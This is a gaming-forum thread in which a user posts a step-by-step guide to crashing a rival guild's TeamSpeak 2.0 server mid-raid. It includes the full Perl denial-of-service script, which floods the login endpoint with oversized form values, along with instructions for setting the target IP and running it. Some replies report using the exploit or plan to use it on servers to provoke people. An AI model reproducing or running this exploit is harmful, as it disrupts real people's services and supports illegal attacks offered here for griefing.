how to shutdown a teamspeak server with no admin rights

[blargz]

**the following is not for the light hearted. This exploit will take you a little while to understand and gather what you need. If you are simply looking for point and click exploits...this is not for you (although you may learn a few things doing this)**

This is for educational puposes only, any use of this guide/exploit is done at the user's risk.

###YOU DO NOT NEED TO DOWNLOAD A COPY OF LINUX AND USE NANO IF YOU ARE USING ACTIVEPERL OR ANY OTHER FLAVOR OF PERL FOR WINDOWS###

Ok...what you are about to do is download a copy of a linux distro, compile exploit code and edit it, and run an exploit. I have personally used this exploit and it worked beautifully. Basically you can shut down a rival ally/horde teamspeak server while they are using it for a raid...+bonus points if they are on a boss fight.

1) You will need to go to Remote-Exploit.org - Supplying offensive security products to the world and download a copy of Back|track 2. This is a linux operating system used by hackers. Any distro of linux can be used as long as you have perl installed.

2) Burn this .iso file to a disk and boot off of it. You may have to enter a one time boot menu, or the BIOS to select the cd-rom as the bootable device.

3) Boot off of the disk that you burned and follow the onscreen menu. Basically just type root as the username and toor as the password. Then type startx to start an easier way to use this linux distro.

4) open a terminal window and type nano teamspeak.pl. If you are using a different version of linux...feel free to use any text editor you would like. After you type nano teamspeak.pl a window will open allowing you to type in it. Copy and paste the following code into the nano window.



#!/usr/bin/perl

# TeamSpeak 2.0 (Windows Release) Remote D0S Exploit by Yag Kohha (skyhole [at] gmail.com)
# Vendor URL: TeamSpeak - Welcome to TeamSpeak
# TeamSpeak WebServer has no tcp session expire and no checks for incoming values length.
# TODO:
# Edit $target value
# Run script
# CPU 100%, Memory up for 1.2 Gb per one attack session.
# Greetz: str0ke & milw0rm proj

use IO::Socket;

$target = 'xxx.xxx.xxx.xxx';
$port_tcp=14534;

$buffer_ascii= 'A' x 0xc00000;
$buffer_dig= '659090';
$req = "username\=$buffer_ascii\&password\=$buffer_ascii\&serverport\=$buffer_dig\&subm it\=Login";
$uagent = 'Mozilla 5.0';
my $res;
my $tmp;

print "\nStarting D0S\n\n";
my $sock = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>"$target", PeerPort=>"$port_tcp") or die "\n Could not connect to host\n\n";

print $sock "POST /login.tscmd HTTP/1.1\r\n";
print $sock "Host: ".$target."\r\n";
print $sock "User-Agent: ".$uagent."\r\n";
print $sock "Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5\r\n";
print $sock "Accept-Language: it-it,it;q=0.8,en-us;q=0.5,en;q=0.3\r\n";
print $sock "Accept-Encoding: gzip,deflate\r\n";
print $sock "Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7\r\n";
print $sock "Connection: close\r\n";
print $sock "Referer: http://".$target."/slogin.html\r\n";
print $sock "Content-Type: application/x-www-form-urlencoded\r\n";
print $sock "Content-Length: ".length($req)."\r\n\r\n";
print $sock $req;
print $sock "\n";

while ( $res = <$sock> ) {
$tmp.= $res;
}
print $tmp;
close($sock);



5) Now you will need to find following text in the exploit "$target". Beside this you will see xxx.xxx.xxx.xxx. You will need to enter the ip address of the target teamspeak server into this area, under this you will see $port...you may have to change the port depending...try the default one and the actual one you connect with. Now you can save and exit (read the instructions at the bottom of the nano screen to do this). Once you have saved and exited type chmod 755 teamspeak.pl (this allows this script to be ran).

6) Voila...you should now have a working exploit. All you must do is wait until you'd like to shut down their teamspeak server and type ./teamspeak.pl.

What this does is illegal so use at your own risk. It's called a "DOS (denial of service)" and is a tactic used by hackers. I realize this is difficult and in order to actually get any rep I will have to provide some sort of support, so post any problems you have and I will try and help.

If this by some sort of crazy odds is a repost or found somewhere other than mmowned.com it is by chance. This exploit is a publicly available exploit...to prove go to milw0rm - exploits : vulnerabilities : videos : papers : shellcode and do a search for teamspeak. I am merely showing how to compile and run it.

Also, this is my first guide. I apologize if it appears to not have been written well. Thanks and enjoy

[holmedog]

You do realize you can run perl from windows right?

[blargz]

yep...if anyone knows anything about coding...feel free to use the exploit code however you'd like.

[jon419]

This is actually a Denial of Serivce attack.

A buffer overflow attack is one in which you use a program to access memory outside the intended memory space for that application. Potentially overwriting the memory of another application.

[Draz]

But why do we need Linux? You can install perl on windows as well... please someone clarify!

-Draz

[blargz]

1) Correct this is a dos...not a buffer overflow...sorry about that. I wrote this several times...(i was logged out due to inactivity during writing it and didn't realize it /cry). I wrote this one with haste...so I will fix it. Good catch

2) You don't have to use linux...I just do. You may find the back|track distro to be pretty nice. I didn't realize how advanced the audience would be. As I stated, you can use the exploit code however you would like.

[jon419]

2) You don't have to use linux...I just do. You may find the back|track distro to be pretty nice. I didn't realize how advanced the audience would be. As I stated, you can use the exploit code however you would like.

If the audience isn't advanced, i think it would be easier to just instruct them how to install perl on windows (really easy) and then edit your file using notepad and running from command prompt.

But good contribution none-the-less.

[Draz]

Oké I've always wanted to use Linux so guess this would be a nice time I'll prolly try this lil' exploit tomorrow OR wednesday, I'll +Rep & give feedback accordingley

-Draz

[stefonalfaro]

how do you get perl? do I need perl? whats linux disto?

[Democides]

now im gonna go do this on all the servers im on, and wait until someone starts to get mad

[CharmFoSho]

how do you get perl? do I need perl? whats linux disto?

..you know what a pc is? >_>


I have done this few times now... +Rep ... I changed sum of the stuff btw.. small edits :P

[blargz]

I have done this few times now... +Rep ... I changed sum of the stuff btw.. small edits :P

what'd you change? glad it's working for you

[blargz]

how do you get perl? do I need perl? whats linux disto?

this is a pretty technical task...however, if you follow my guide it shouldn't be too difficult.

Yes you need perl, it's installed on the linux distro that I linked.

A linux distro is a linux distrobution...distro is basically slang for operating system. If you try it and have problems...post them and I will try to help.